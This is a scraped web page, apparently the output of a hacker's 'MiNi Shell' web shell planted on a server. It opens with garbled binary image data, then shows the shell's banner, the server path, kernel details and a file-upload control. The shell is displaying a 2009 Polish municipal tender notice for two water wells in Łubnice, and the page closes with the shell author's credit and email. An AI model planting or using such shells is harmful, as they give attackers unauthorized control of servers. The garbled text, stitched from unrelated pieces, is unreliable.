JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/95112-N-2009.html

<p class="kh_header"><b>Łubnice: Zabezpieczenie potrzeb  bytowych mieszkańców Gminy Łubnice poprzez budowę dwóch  dodatkowych ujęć  wody</b><br>
<b>Numer ogłoszenia: 95112 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , Łubnice 66, 28-232 Łubnice, woj. świętokrzyskie, tel. 015 8659236.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zabezpieczenie potrzeb  bytowych mieszkańców Gminy Łubnice poprzez budowę dwóch  dodatkowych ujęć  wody.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zabezpieczenie potrzeb  bytowych mieszkańców Gminy Łubnice poprzez budowę dwóch  dodatkowych ujęć  wody.     Szczegółowy opis przedmiotu zamówienia
a/ Opracowanie projektu  prac geologicznych na ustalenie zasobów eksploatacyjnych ujęcia wód podziemnych z utworów czwartorzędowych -studnia zastępcza S-3a, studnia  wspomagająca S-6 oraz  na likwidację studni S-3 na ujęciu wodociągu grupowego.
b/ Wykonanie badań hydrogeologicznych zgodnie z zatwierdzonym projektem prac geologicznych.
c//Opracowanie dokumentacji hydrogeologicznej oraz przyjęcie zasobów przez Urząd Marszałkowski w Kielcach. 
d/ Aktualizacja  mapy syt-wys. w skali 1:1000 do celów projektowych na pow. ok. 3 ha, sporządzenie mapy rejonu studni w skali 1;100 rejonu studni/licząc w promieniu 10 m od studni/ 
e /Opracowanie projektu , wykonanie  i podłączenie  studni / w części budowlanej   zastosować do  wykonania studni  rury PCV    oraz obudowy kompaktowej   z głowicą i grzałką, część elektryczna, przejścia pod  drogą, uzyskanie wszelkich niezbędnych uzgodnień, decyzji, operatu wodno-prawnego włącznie  z uzyskaniem pozwolenia  na budowę,
f/  opracowanie  projektu wykonawczego, 
g/ opracowanie przedmiaru robót, 
 h/  opracowanie kosztorysu inwestorskiego,
i/  opracowanie specyfikacji technicznej wykonania i odbioru  robót,
j/ zlikwidowanie studni S-3 oraz budowa  i podłączenie studni S-3a, S-6  zgodnie  z wykonanym projektem.
k/ wykonanie  inwentaryzacji geodezyjnej wykonanych robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.12.35.00-0, 71.12.19.00-0, 42.99.29.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy wykonawca przystępujący do przetargu obowiązany jest wnieść wadium najpóźniej do dnia  28.04. 2009r. do godziny 10.00 (czasu lokalnego) w wysokości:  5000 PLN
1. Wadium może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U.z 2007  Nr 42 poz 275).
2.  W przypadku, kiedy wadium jest wnoszone w pieniądzu, należy je wpłacić przelewem                 z dopiskiem  zabezpieczenie potrzeb  bytowych mieszkańców Gminy Łubnice poprzez budowę dwóch  dodatkowych ujęć  wody.
na następujące konto: Nadwiślański Bank Spółdzielczy w Solcu Zdroju o/Łubnice,    
      Nr 05851700070060000000260029
 3. Zamawiający zwróci niezwłocznie wadium, jeżeli:
a)	upłynie termin związania ofertą;
b)	zostanie zawarta umowa i wniesiono zabezpieczenie należytego wykonania tej      umowy;
c)	zamawiający unieważni postępowanie przetargowe, a protesty zostaną ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
4. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy:
a) który wycofał ofertę przed upływem terminu składania ofert;
b) który został wykluczony z postępowania;
c) którego oferta została odrzucona.
5. Złożenie przez wykonawcę, którego oferta została odrzucona lub wykluczonego                      z postępowania, wniosku o zwrot wadium jest równoznaczne ze zrzeczeniem się przez wykonawcę prawa do wniesienia protestu.
6. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
             c) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
7. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca 
w odpowiedzi na wezwanie o którym mowa w art. 26 ust 3., nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
8. Jeżeli wadium zostało wniesione w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
9. Wymaga się załączenia do oferty dokumentu wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie publiczne może ubiegać się Wykonawca, który:
1.	Spełnia warunki zawarte w art. 22 ust. 1 ustawy tzn.:
- posiada uprawnienia do wykonywania określonej działalności lub czynności,      
                    jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- Posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także 
  dysponuje osobami zdolnymi do wykonania zamówienia lub przedstawią  
  pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
  technicznego i osób zdolnych do wykonania zamówienia.
-  Znajduje się w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie  
  zamówienia
- Nie podlega wykluczeniu z postępowania o udzielenie zamówienia publicznego
  na podstawie art. 24 ustawy
oraz:
- W okresie 5 lat wykonał nie mniej niż 2 zadania odpowiadające swoim rodzajem
  i wartością robotom stanowiącym przedmiot zamówienia
- Musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej
   działalności gospodarczej
Ocena spełnienia wymaganych warunków od Wykonawców zostanie dokonana w systemie spełnia/nie spełnia, na podstawie dokumentów wymienionych w Rozdziale V..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Ocena spełnienia warunków zostanie dokonana na podstawie następujących dokumentów:
      1.   Wypełniony Formularz oferty 
      2.  Oświadczenie Wykonawcy w trybie art. 22 ust.1 i art. 24 ustawy
      3.  Aktualnego odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do 
           ewidencji działalności gospodarczej, potwierdzające dopuszczenie Wykonawcy do 
           obrotu prawnego w  zakresie objętym zamówieniem, wystawione nie wcześniej niż 
           6 miesięcy przed upływem terminu składania ofert,
      4.  Aktualnego zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego 	oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 	Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem 	podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub 	zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na 	raty zaległości, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu 	składania ofert, 
      5.   Potencjał kadrowy - wykaz osób, którymi dysponuje lub będzie dysponował wykonawca
            i które będą uczestniczyć w wykonywaniu zamówienia, wraz informacjami na temat ich 
            kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania 
            zamówienia, a także zakresu wykonywanych przez nie czynności.
      6.  Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do 
           wykonania zamówienia, jeżeli w wykazie, o którym mowa w punkcie 5wykonawca 
           wskazał osoby, którymi będzie dysponował
      7. Stwierdzających, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają 
           wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
      8.  Wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, którymi dysponuje 
           lub będzie dysponował wykonawca
      9.  Pisemnego zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania 
           zamówienia narządzi i urządzeń, jeżeli w wykazie, o którym mowa w punkcie 8 wykonawca 
           wskazał narzędzia i urządzenia, którymi będzie dysponował
     10.   Polisa lub inny dokument ubezpieczenia potwierdzającego, że wykonawca jest 	ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 	gospodarczej w dniu podpisania umowy.
     11. Wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia 
          postępowania o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest 
          krótszy - w tym okresie, co najmniej dwóch robót budowlanych, które odpowiadają 
          swoim rodzajem i wartością przedmiotowi niniejszego zamówienia z podaniem ich 
          wartości, dat wykonania i odbiorców oraz dokumenty potwierdzające, że roboty te 
          zostały wykonane należycie.  
      12.  Pełnomocnictwo osoby lub osób podpisujących ofertę, jeżeli nie wynika to bezpośrednio z 	załączonych dokumentów. Pełnomocnictwo podlega opłacie skarbowej zgodnie z ustawą z 	dnia 09.09.2000 r. o opłacie skarbowej ( Dz.U. z 17.10.2000 r.),
   
W przypadku złożenia oferty wspólnej należy złożyć umowę regulującą współpracę podmiotów występujących wspólnie.
Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Każdy z przedsiębiorców składających ofertę wspólną musi załączyć dokumenty, o których mowa w rozdziale V w pkt. 2-12..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> urzadlubnice.republika.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy
Łubnice 66A
pokój nr 8.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2009 godzina 10:00, miejsce: Urząd Gminy
Łubnice 66A
pokój nr 8.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com